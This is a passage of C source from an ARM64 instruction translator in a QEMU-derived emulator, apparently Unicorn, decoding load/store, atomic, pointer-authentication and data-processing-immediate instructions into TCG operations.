(size > 4) { unallocated_encoding(s); return; } is_store = !extract32(opc, 0, 1); if (!fp_access_check(s)) { return; } } else { if (size == 3 && opc == 2) { /* PRFM - prefetch */ return; } if (opc == 3 && size > 1) { unallocated_encoding(s); return; } is_store = (opc == 0); is_signed = extract32(opc, 1, 1); is_extended = (size < 3) && extract32(opc, 0, 1); } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); offset = imm12 << size; tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_store) { do_fp_st(s, rt, clean_addr, size); } else { do_fp_ld(s, rt, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); bool iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (is_store) { do_gpr_st(s, tcg_rt, clean_addr, size, true, rt, iss_sf, false); } else { do_gpr_ld(s, tcg_rt, clean_addr, size, is_signed, is_extended, true, rt, iss_sf, false); } } } /* Atomic memory operations * * 31 30 27 26 24 22 21 16 15 12 10 5 0 * +------+-------+---+-----+-----+---+----+----+-----+-----+----+-----+ * | size | 1 1 1 | V | 0 0 | A R | 1 | Rs | o3 | opc | 0 0 | Rn | Rt | * +------+-------+---+-----+-----+--------+----+-----+-----+----+-----+ * * Rt: the result register * Rn: base address or SP * Rs: the source register for the operation * V: vector flag (always 0 as of v8.3) * A: acquire flag * R: release flag */ static void disas_ldst_atomic(DisasContext *s, uint32_t insn, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rs = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int o3_opc = extract32(insn, 12, 4); bool r = extract32(insn, 22, 1); bool a = extract32(insn, 23, 1); TCGv_i64 tcg_rs, clean_addr; AtomicThreeOpFn *fn; if (is_vector || !dc_isar_feature(aa64_atomics, s)) { unallocated_encoding(s); return; } switch (o3_opc) { case 000: /* LDADD */ fn = tcg_gen_atomic_fetch_add_i64; break; case 001: /* LDCLR */ fn = tcg_gen_atomic_fetch_and_i64; break; case 002: /* LDEOR */ fn = tcg_gen_atomic_fetch_xor_i64; break; case 003: /* LDSET */ fn = tcg_gen_atomic_fetch_or_i64; break; case 004: /* LDSMAX */ fn = tcg_gen_atomic_fetch_smax_i64; break; case 005: /* LDSMIN */ fn = tcg_gen_atomic_fetch_smin_i64; break; case 006: /* LDUMAX */ fn = tcg_gen_atomic_fetch_umax_i64; break; case 007: /* LDUMIN */ fn = tcg_gen_atomic_fetch_umin_i64; break; case 010: /* SWP */ fn = tcg_gen_atomic_xchg_i64; break; case 014: /* LDAPR, LDAPRH, LDAPRB */ if (!dc_isar_feature(aa64_rcpc_8_3, s) || rs != 31 || a != 1 || r != 0) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); if (o3_opc == 014) { /* * LDAPR* are a special case because they are a simple load, not a * fetch-and-do-something op. * The architectural consistency requirements here are weaker than * full load-acquire (we only need "load-acquire processor consistent"), * but we choose to implement them as full LDAQ. */ do_gpr_ld(s, cpu_reg(s, rt), clean_addr, size, false, false, true, rt, disas_ldst_compute_iss_sf(size, false, 0), true); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); return; } tcg_rs = read_cpu_reg(s, rs, true); if (o3_opc == 1) { /* LDCLR */ tcg_gen_not_i64(tcg_ctx, tcg_rs, tcg_rs); } /* The tcg atomic primitives are all full barriers. Therefore we * can ignore the Acquire and Release bits of this instruction. */ fn(tcg_ctx, cpu_reg(s, rt), clean_addr, tcg_rs, get_mem_index(s), s->be_data | size | MO_ALIGN); } /* * PAC memory operations * * 31 30 27 26 24 22 21 12 11 10 5 0 * +------+-------+---+-----+-----+---+--------+---+---+----+-----+ * | size | 1 1 1 | V | 0 0 | M S | 1 | imm9 | W | 1 | Rn | Rt | * +------+-------+---+-----+-----+---+--------+---+---+----+-----+ * * Rt: the result register * Rn: base address or SP * V: vector flag (always 0 as of v8.3) * M: clear for key DA, set for key DB * W: pre-indexing flag * S: sign for imm9. */ static void disas_ldst_pac(DisasContext *s, uint32_t insn, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); bool is_wback = extract32(insn, 11, 1); bool use_key_a = !extract32(insn, 23, 1); int offset; TCGv_i64 clean_addr, dirty_addr, tcg_rt; if (size != 3 || is_vector || !dc_isar_feature(aa64_pauth, s)) { unallocated_encoding(s); return; } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); if (s->pauth_active) { if (use_key_a) { gen_helper_autda(tcg_ctx, dirty_addr, tcg_ctx->cpu_env, dirty_addr, tcg_ctx->cpu_X[31]); } else { gen_helper_autdb(tcg_ctx, dirty_addr, tcg_ctx->cpu_env, dirty_addr, tcg_ctx->cpu_X[31]); } } /* Form the 10-bit signed, scaled offset. */ offset = (extract32(insn, 22, 1) << 9) | extract32(insn, 12, 9); offset = sextract32(offset << size, 0, 10 + size); tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); /* Note that "clean" and "dirty" here refer to TBI not PAC. */ clean_addr = clean_data_tbi(s, dirty_addr); tcg_rt = cpu_reg(s, rt); do_gpr_ld(s, tcg_rt, clean_addr, size, /* is_signed */ false, /* extend */ false, /* iss_valid */ !is_wback, /* iss_srt */ rt, /* iss_sf */ true, /* iss_ar */ false); if (is_wback) { tcg_gen_mov_i64(tcg_ctx, cpu_reg_sp(s, rn), dirty_addr); } } /* * LDAPR/STLR (unscaled immediate) * * 31 30 24 22 21 12 10 5 0 * +------+-------------+-----+---+--------+-----+----+-----+ * | size | 0 1 1 0 0 1 | opc | 0 | imm9 | 0 0 | Rn | Rt | * +------+-------------+-----+---+--------+-----+----+-----+ * * Rt: source or destination register * Rn: base register * imm9: unscaled immediate offset * opc: 00: STLUR*, 01/10/11: various LDAPUR* * size: size of load/store */ static void disas_ldst_ldapr_stlr(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int offset = sextract32(insn, 12, 9); int opc = extract32(insn, 22, 2); int size = extract32(insn, 30, 2); TCGv_i64 clean_addr, dirty_addr; bool is_store = false; bool is_signed = false; bool extend = false; bool iss_sf; if (!dc_isar_feature(aa64_rcpc_8_4, s)) { unallocated_encoding(s); return; } switch (opc) { case 0: /* STLURB */ is_store = true; break; case 1: /* LDAPUR* */ break; case 2: /* LDAPURS* 64-bit variant */ if (size == 3) { unallocated_encoding(s); return; } is_signed = true; break; case 3: /* LDAPURS* 32-bit variant */ if (size > 1) { unallocated_encoding(s); return; } is_signed = true; extend = true; /* zero-extend 32->64 after signed load */ break; default: g_assert_not_reached(); } iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); clean_addr = clean_data_tbi(s, dirty_addr); if (is_store) { /* Store-Release semantics */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); do_gpr_st(s, cpu_reg(s, rt), clean_addr, size, true, rt, iss_sf, true); } else { /* * Load-AcquirePC semantics; we implement as the slightly more * restrictive Load-Acquire. */ do_gpr_ld(s, cpu_reg(s, rt), clean_addr, size, is_signed, extend, true, rt, iss_sf, true); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } } /* Load/store register (all forms) */ static void disas_ldst_reg(DisasContext *s, uint32_t insn) { int rt = extract32(insn, 0, 5); int opc = extract32(insn, 22, 2); bool is_vector = extract32(insn, 26, 1); int size = extract32(insn, 30, 2); switch (extract32(insn, 24, 2)) { case 0: if (extract32(insn, 21, 1) == 0) { /* Load/store register (unscaled immediate) * Load/store immediate pre/post-indexed * Load/store register unprivileged */ disas_ldst_reg_imm9(s, insn, opc, size, rt, is_vector); return; } switch (extract32(insn, 10, 2)) { case 0: disas_ldst_atomic(s, insn, size, rt, is_vector); return; case 2: disas_ldst_reg_roffset(s, insn, opc, size, rt, is_vector); return; default: disas_ldst_pac(s, insn, size, rt, is_vector); return; } break; case 1: disas_ldst_reg_unsigned_imm(s, insn, opc, size, rt, is_vector); return; } unallocated_encoding(s); } /* AdvSIMD load/store multiple structures * * 31 30 29 23 22 21 16 15 12 11 10 9 5 4 0 * +---+---+---------------+---+-------------+--------+------+------+------+ * | 0 | Q | 0 0 1 1 0 0 0 | L | 0 0 0 0 0 0 | opcode | size | Rn | Rt | * +---+---+---------------+---+-------------+--------+------+------+------+ * * AdvSIMD load/store multiple structures (post-indexed) * * 31 30 29 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---------------+---+---+---------+--------+------+------+------+ * | 0 | Q | 0 0 1 1 0 0 1 | L | 0 | Rm | opcode | size | Rn | Rt | * +---+---+---------------+---+---+---------+--------+------+------+------+ * * Rt: first (or only) SIMD&FP register to be transferred * Rn: base address or SP * Rm (post-index only): post-index register (when !31) or size dependent #imm */ static void disas_ldst_multiple_struct(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 10, 2); int opcode = extract32(insn, 12, 4); bool is_store = !extract32(insn, 22, 1); bool is_postidx = extract32(insn, 23, 1); bool is_q = extract32(insn, 30, 1); TCGv_i64 clean_addr, tcg_rn, tcg_ebytes; MemOp endian = s->be_data; int ebytes; /* bytes per element */ int elements; /* elements per vector */ int rpt; /* num iterations */ int selem; /* structure elements */ int r; if (extract32(insn, 31, 1) || extract32(insn, 21, 1)) { unallocated_encoding(s); return; } if (!is_postidx && rm != 0) { unallocated_encoding(s); return; } /* From the shared decode logic */ switch (opcode) { case 0x0: rpt = 1; selem = 4; break; case 0x2: rpt = 4; selem = 1; break; case 0x4: rpt = 1; selem = 3; break; case 0x6: rpt = 3; selem = 1; break; case 0x7: rpt = 1; selem = 1; break; case 0x8: rpt = 1; selem = 2; break; case 0xa: rpt = 2; selem = 1; break; default: unallocated_encoding(s); return; } if (size == 3 && !is_q && selem != 1) { /* reserved */ unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (rn == 31) { gen_check_sp_alignment(s); } /* For our purposes, bytes are always little-endian. */ if (size == 0) { endian = MO_LE; } /* Consecutive little-endian elements from a single register * can be promoted to a larger little-endian operation. */ if (selem == 1 && endian == MO_LE) { size = 3; } ebytes = 1 << size; elements = (is_q ? 16 : 8) / ebytes; tcg_rn = cpu_reg_sp(s, rn); clean_addr = clean_data_tbi(s, tcg_rn); tcg_ebytes = tcg_const_i64(tcg_ctx, ebytes); for (r = 0; r < rpt; r++) { int e; for (e = 0; e < elements; e++) { int xs; for (xs = 0; xs < selem; xs++) { int tt = (rt + r + xs) % 32; if (is_store) { do_vec_st(s, tt, e, clean_addr, size, endian); } else { do_vec_ld(s, tt, e, clean_addr, size, endian); } tcg_gen_add_i64(tcg_ctx, clean_addr, clean_addr, tcg_ebytes); } } } tcg_temp_free_i64(tcg_ctx, tcg_ebytes); if (!is_store) { /* For non-quad operations, setting a slice of the low * 64 bits of the register clears the high 64 bits (in * the ARM ARM pseudocode this is implicit in the fact * that 'rval' is a 64 bit wide variable). * For quad operations, we might still need to zero the * high bits of SVE. */ for (r = 0; r < rpt * selem; r++) { int tt = (rt + r) % 32; clear_vec_high(s, is_q, tt); } } if (is_postidx) { if (rm == 31) { tcg_gen_addi_i64(tcg_ctx, tcg_rn, tcg_rn, rpt * elements * selem * ebytes); } else { tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); } } } /* AdvSIMD load/store single structure * * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * | 0 | Q | 0 0 1 1 0 1 0 | L R | 0 0 0 0 0 | opc | S | size | Rn | Rt | * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * * AdvSIMD load/store single structure (post-indexed) * * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * | 0 | Q | 0 0 1 1 0 1 1 | L R | Rm | opc | S | size | Rn | Rt | * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * * Rt: first (or only) SIMD&FP register to be transferred * Rn: base address or SP * Rm (post-index only): post-index register (when !31) or size dependent #imm * index = encoded in Q:S:size dependent on size * * lane_size = encoded in R, opc * transfer width = encoded in opc, S, size */ static void disas_ldst_single_struct(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 10, 2); int S = extract32(insn, 12, 1); int opc = extract32(insn, 13, 3); int R = extract32(insn, 21, 1); int is_load = extract32(insn, 22, 1); int is_postidx = extract32(insn, 23, 1); int is_q = extract32(insn, 30, 1); int scale = extract32(opc, 1, 2); int selem = (extract32(opc, 0, 1) << 1 | R) + 1; bool replicate = false; int index = is_q << 3 | S << 2 | size; int ebytes, xs; TCGv_i64 clean_addr, tcg_rn, tcg_ebytes; if (extract32(insn, 31, 1)) { unallocated_encoding(s); return; } if (!is_postidx && rm != 0) { unallocated_encoding(s); return; } switch (scale) { case 3: if (!is_load || S) { unallocated_encoding(s); return; } scale = size; replicate = true; break; case 0: break; case 1: if (extract32(size, 0, 1)) { unallocated_encoding(s); return; } index >>= 1; break; case 2: if (extract32(size, 1, 1)) { unallocated_encoding(s); return; } if (!extract32(size, 0, 1)) { index >>= 2; } else { if (S) { unallocated_encoding(s); return; } index >>= 3; scale = 3; } break; default: g_assert_not_reached(); } if (!fp_access_check(s)) { return; } ebytes = 1 << scale; if (rn == 31) { gen_check_sp_alignment(s); } tcg_rn = cpu_reg_sp(s, rn); clean_addr = clean_data_tbi(s, tcg_rn); tcg_ebytes = tcg_const_i64(tcg_ctx, ebytes); for (xs = 0; xs < selem; xs++) { if (replicate) { /* Load and replicate to all elements */ TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_tmp, clean_addr, get_mem_index(s), s->be_data + scale); tcg_gen_gvec_dup_i64(tcg_ctx, scale, vec_full_reg_offset(s, rt), (is_q + 1) * 8, vec_full_reg_size(s), tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } else { /* Load/store one element per register */ if (is_load) { do_vec_ld(s, rt, index, clean_addr, scale, s->be_data); } else { do_vec_st(s, rt, index, clean_addr, scale, s->be_data); } } tcg_gen_add_i64(tcg_ctx, clean_addr, clean_addr, tcg_ebytes); rt = (rt + 1) % 32; } tcg_temp_free_i64(tcg_ctx, tcg_ebytes); if (is_postidx) { if (rm == 31) { tcg_gen_addi_i64(tcg_ctx, tcg_rn, tcg_rn, selem * ebytes); } else { tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); } } } /* Loads and stores */ static void disas_ldst(DisasContext *s, uint32_t insn) { if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_MEM_READ, s->pc_curr) || HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_MEM_WRITE, s->pc_curr)) { // sync PC if there are memory hooks. // TODO: Better granularity by checking ldst type and corresponding hook type gen_a64_set_pc_im(s->uc->tcg_ctx, s->pc_curr); } switch (extract32(insn, 24, 6)) { case 0x08: /* Load/store exclusive */ disas_ldst_excl(s, insn); break; case 0x18: case 0x1c: /* Load register (literal) */ disas_ld_lit(s, insn); break; case 0x28: case 0x29: case 0x2c: case 0x2d: /* Load/store pair (all forms) */ disas_ldst_pair(s, insn); break; case 0x38: case 0x39: case 0x3c: case 0x3d: /* Load/store register (all forms) */ disas_ldst_reg(s, insn); break; case 0x0c: /* AdvSIMD load/store multiple structures */ disas_ldst_multiple_struct(s, insn); break; case 0x0d: /* AdvSIMD load/store single structure */ disas_ldst_single_struct(s, insn); break; case 0x19: /* LDAPR/STLR (unscaled immediate) */ if (extract32(insn, 10, 2) != 0 || extract32(insn, 21, 1) != 0) { unallocated_encoding(s); break; } disas_ldst_ldapr_stlr(s, insn); break; default: unallocated_encoding(s); break; } } /* PC-rel. addressing * 31 30 29 28 24 23 5 4 0 * +----+-------+-----------+-------------------+------+ * | op | immlo | 1 0 0 0 0 | immhi | Rd | * +----+-------+-----------+-------------------+------+ */ static void disas_pc_rel_adr(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int page, rd; uint64_t base; uint64_t offset; page = extract32(insn, 31, 1); /* SignExtend(immhi:immlo) -> offset */ offset = sextract64(insn, 5, 19); offset = offset << 2 | extract32(insn, 29, 2); rd = extract32(insn, 0, 5); base = s->pc_curr; if (page) { /* ADRP (page based) */ base &= ~0xfff; offset <<= 12; } tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), base + offset); } /* * Add/subtract (immediate) * * 31 30 29 28 24 23 22 21 10 9 5 4 0 * +--+--+--+-----------+-----+-------------+-----+-----+ * |sf|op| S| 1 0 0 0 1 |shift| imm12 | Rn | Rd | * +--+--+--+-----------+-----+-------------+-----+-----+ * * sf: 0 -> 32bit, 1 -> 64bit * op: 0 -> add , 1 -> sub * S: 1 -> set flags * shift: 00 -> LSL imm by 0, 01 -> LSL imm by 12 */ static void disas_add_sub_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); uint64_t imm = extract32(insn, 10, 12); int shift = extract32(insn, 22, 2); bool setflags = extract32(insn, 29, 1); bool sub_op = extract32(insn, 30, 1); bool is_64bit = extract32(insn, 31, 1); TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); TCGv_i64 tcg_rd = setflags ? cpu_reg(s, rd) : cpu_reg_sp(s, rd); TCGv_i64 tcg_result; switch (shift) { case 0x0: break; case 0x1: imm <<= 12; break; default: unallocated_encoding(s); return; } tcg_result = tcg_temp_new_i64(tcg_ctx); if (!setflags) { if (sub_op) { tcg_gen_subi_i64(tcg_ctx, tcg_result, tcg_rn, imm); } else { tcg_gen_addi_i64(tcg_ctx, tcg_result, tcg_rn, imm); } } else { TCGv_i64 tcg_imm = tcg_const_i64(tcg_ctx, imm); if (sub_op) { gen_sub_CC(tcg_ctx, is_64bit, tcg_result, tcg_rn, tcg_imm); } else { gen_add_CC(tcg_ctx, is_64bit, tcg_result, tcg_rn, tcg_imm); } tcg_temp_free_i64(tcg_ctx, tcg_imm); } if (is_64bit) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); } tcg_temp_free_i64(tcg_ctx, tcg_result); } /* The input should be a value in the bottom e bits (with higher * bits zero); returns that value replicated into every element * of size e in a 64 bit integer. */ static uint64_t bitfield_replicate(uint64_t mask, unsigned int e) { assert(e != 0); while (e < 64) { mask |= mask << e; e *= 2; } return mask; } /* Return a value with the bottom len bits set (where 0 < len <= 64) */ static inline uint64_t bitmask64(unsigned int length) { assert(length > 0 && length <= 64); return ~0ULL >> (64 - length); } /* Simplified variant of pseudocode DecodeBitMasks() for the case where we * only require the wmask. Returns false if the imms/immr/immn are a reserved * value (ie should cause a guest UNDEF exception), and true if they are * valid, in which case the decoded bit pattern is written to result. */ bool logic_imm_decode_wmask(uint64_t *result, unsigned int immn, unsigned int imms, unsigned int immr) { uint64_t mask; unsigned e, levels, s, r; int len; assert(immn < 2 && imms < 64 && immr < 64); /* The bit patterns we create here are 64 bit patterns which * are vectors of identical elements of size e = 2, 4, 8, 16, 32 or * 64 bits each. Each element contains the same value: a run * of between 1 and e-1 non-zero bits, rotated within the * element by between 0 and e-1 bits. * * The element size and run length are encoded into immn (1 bit) * and imms (6 bits) as follows: * 64 bit elements: immn = 1, imms = <length of run - 1> * 32 bit elements: immn = 0, imms = 0 : <length of run - 1> * 16 bit elements: immn = 0, imms = 10 : <length of run - 1> * 8 bit elements: immn = 0, imms = 110 : <length of run - 1> * 4 bit elements: immn = 0, imms = 1110 : <length of run - 1> * 2 bit elements: immn = 0, imms = 11110 : <length of run - 1> * Notice that immn = 0, imms = 11111x is the only combination * not covered by one of the above options; this is reserved. * Further, <length of run - 1> all-ones is a reserved pattern. * * In all cases the rotation is by immr % e (and immr is 6 bits). */ /* First determine the element size */ len = 31 - clz32((immn << 6) | (~imms & 0x3f)); if (len < 1) { /* This is the immn == 0, imms == 0x11111x case */ return false; } e = 1 << len; levels = e - 1; s = imms & levels; r = immr & levels; if (s == levels) { /* <length of run - 1> mustn't be all-ones. */ return false; } /* Create the value of one element: s+1 set bits rotated * by r within the element (which is e bits wide)... */ mask = bitmask64(s + 1); if (r) { mask = (mask >> r) | (mask << (e - r)); mask &= bitmask64(e); } /* ...then replicate the element over the whole 64 bit value */ mask = bitfield_replicate(mask, e); *result = mask; return true; } /* Logical (immediate) * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 * +----+-----+-------------+---+------+------+------+------+ * | sf | opc | 1 0 0 1 0 0 | N | immr | imms | Rn | Rd | * +----+-----+-------------+---+------+------+------+------+ */ static void disas_logic_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, opc, is_n, immr, imms, rn, rd; TCGv_i64 tcg_rd, tcg_rn; uint64_t wmask; bool is_and = false; sf = extract32(insn, 31, 1); opc = extract32(insn, 29, 2); is_n = extract32(insn, 22, 1); immr = extract32(insn, 16, 6); imms = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (!sf && is_n) { unallocated_encoding(s); return; } if (opc == 0x3) { /* ANDS */ tcg_rd = cpu_reg(s, rd); } else { tcg_rd = cpu_reg_sp(s, rd); } tcg_rn = cpu_reg(s, rn); if (!logic_imm_decode_wmask(&wmask, is_n, imms, immr)) { /* some immediate field values are reserved */ unallocated_encoding(s); return; } if (!sf) { wmask &= 0xffffffff; } switch (opc) { case 0x3: /* ANDS */ case 0x0: /* AND */ tcg_gen_andi_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); is_and = true; break; case 0x1: /* ORR */ tcg_gen_ori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); break; case 0x2: /* EOR */ tcg_gen_xori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); break; default: assert(FALSE); /* must handle all above */ break; } if (!sf && !is_and) { /* zero extend final result; we know we can skip this for AND * since the immediate had the high 32 bits clear. */ tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } if (opc == 3) { /* ANDS */ gen_logic_CC(tcg_ctx, sf, tcg_rd); } } /* * Move wide (immediate) * * 31 30 29 28 23 22 21 20 5 4 0 * +--+-----+-------------+-----+----------------+------+ * |sf| opc | 1 0 0 1 0 1 | hw | imm16 | Rd | * +--+-----+-------------+-----+----------------+------+ * * sf: 0 -> 32 bit, 1 -> 64 bit * opc: 00 -> N, 10 -> Z, 11 -> K * hw: shift/16 (0,16, and sf only 32, 48) */ static void disas_movw_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); uint64_t imm = extract32(insn, 5, 16); int sf = extract32(insn, 31, 1); int opc = extract32(insn, 29, 2); int pos = extract32(insn, 21, 2) << 4; TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_imm; if (!sf && (pos >= 32)) { unallocated_encoding(s); return; } switch (opc) { case 0: /* MOVN */ case 2: /* MOVZ */ imm <<= pos; if (opc == 0) { imm = ~imm; } if (!sf) { imm &= 0xffffffffu; } tcg_gen_movi_i64(tcg_ctx, tcg_rd, imm); break; case 3: /* MOVK */ tcg_imm = tcg_const_i64(tcg_ctx, imm); tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm, pos, 16); tcg_temp_free_i64(tcg_ctx, tcg_imm); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } break; default: unallocated_encoding(s); break; } } /* Bitfield * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 * +----+-----+-------------+---+------+------+------+------+ * | sf | opc | 1 0 0 1 1 0 | N | immr | imms | Rn | Rd | * +----+-----+-------------+---+------+------+------+------+ */ static void disas_bitfield(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, n, opc, ri, si, rn, rd, bitsize, pos, len; TCGv_i64 tcg_rd, tcg_tmp; sf = extract32(insn, 31, 1); opc = extract32(insn, 29, 2); n = extract32(insn, 22, 1); ri = extract32(insn, 16, 6); si = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); bitsize = sf ? 64 : 32; if (sf != n || ri >= bitsize || si >= bitsize || opc > 2) { unallocated_encoding(s); return; } tcg_rd = cpu_reg(s, rd); /* Suppress the zero-extend for !sf. Since RI and SI are constrained to be smaller than bitsize, we'll never reference data outside the low 32-bits anyway. */ tcg_tmp = read_cpu_reg(s, rn, 1); /* Recognize simple(r) extractions. */ if (si >= ri) { /* Wd<s-r:0> = Wn<s:r> */ len = (si - ri) + 1; if (opc == 0) { /* SBFM: ASR, SBFX, SXTB, SXTH, SXTW */ tcg_gen_sextract_i64(tcg_ctx, tcg_rd, tcg_tmp, ri, len); goto done; } else if (opc == 2) { /* UBFM: UBFX, LSR, UXTB, UXTH */ tcg_gen_extract_i64(tcg_ctx, tcg_rd, tcg_tmp, ri, len); return; } /* opc == 1, BFXIL fall through to deposit */ tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_tmp, ri); pos = 0; } else { /* Handle the ri > si case with a deposit * Wd<32+s-r,32-r> = Wn<s:0> */ len = si + 1; pos = (bitsize - ri) & (bitsize - 1); } if (opc == 0 && len < ri) { /* SBFM: sign extend the destination field from len to fill the balance of the word. Let the deposit below insert all of those sign bits. */ tcg_gen_sextract_i64(tcg_ctx, tcg_tmp, tcg_tmp, 0, len); len = ri; } if (opc == 1) { /* BFM, BFXIL */ tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, pos, len); } else { /* SBFM or UBFM: We start with zero, and we haven't modified any bits outside bitsize, therefore the zero-extension below is unneeded. */ tcg_gen_deposit_z_i64(tcg_ctx, tcg_rd, tcg_tmp, pos, len); return; } done: if (!sf) { /* zero extend final result */ tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* Extract * 31 30 29 28 23 22 21 20 16 15 10 9 5 4 0 * +----+------+-------------+---+----+------+--------+------+------+ * | sf | op21 | 1 0 0 1 1 1 | N | o0 | Rm | imms | Rn | Rd | * +----+------+-------------+---+----+------+--------+------+------+ */ static void disas_extract(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, n, rm, imm, rn, rd, bitsize, op21, op0; sf = extract32(insn, 31, 1); n = extract32(insn, 22, 1); rm = extract32(insn, 16, 5); imm = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); op21 = extract32(insn, 29, 2); op0 = extract32(insn, 21, 1); bitsize = sf ? 64 : 32; if (sf != n || op21 || op0 || imm >= bitsize) { unallocated_encoding(s); } else { TCGv_i64 tcg_rd, tcg_rm, tcg_rn; tcg_rd = cpu_reg(s, rd); if (unlikely(imm == 0)) { /* tcg shl_i32/shl_i64 is undefined for 32/64 bit shifts, * so an extract from bit 0 is a special case. */ if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); } } else { tcg_rm = cpu_reg(s, rm); tcg_rn = cpu_reg(s, rn); if (sf) { /* Specialization to ROR happens in EXTRACT2. */ tcg_gen_extract2_i64(tcg_ctx, tcg_rd, tcg_rm, tcg_rn, imm); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t0, tcg_rm); if (rm == rn) { tcg_gen_rotri_i32(tcg_ctx, t0, t0, imm); } else { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t1, tcg_rn); tcg_gen_extract2_i32(tcg_ctx, t0, t0, t1, imm); tcg_temp_free_i32(tcg_ctx, t1); } tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, t0); tcg_temp_free_i32(tcg_ctx, t0); } } } } /* Data processing - immediate */ static void disas_data_proc_imm(DisasContext *s, uint32_t insn) { switch (extract32(insn, 23, 6)) { case 0x20: case 0x21: /* PC-rel. addressing */ disas_pc_rel_adr(s, insn); break; case 0x22: case 0x23: /* Add/subtract (immediate) */ disas_add_sub_imm(s, insn); break; case 0x24: /* Logical (immediate) */ disas_logic_imm(s, insn); break; case 0x25: /* Move wide (immediate) */ disas_movw_imm(s, insn); break; case 0x26: /* Bitfield */ disas_bitfield(s, insn); break; case 0x27: /* Extract */ disas_extract(s, insn); break; default: unallocated_encoding(s); break; } } /* Shift a TCGv src by TCGv shift_amount, put result in dst. * Note that it is the caller's responsibility to ensure that the * shift amount is in range (ie 0..31 or 0..63) and provide the ARM * mandated semantics for out of range shifts. */ static void shift_reg(TCGContext 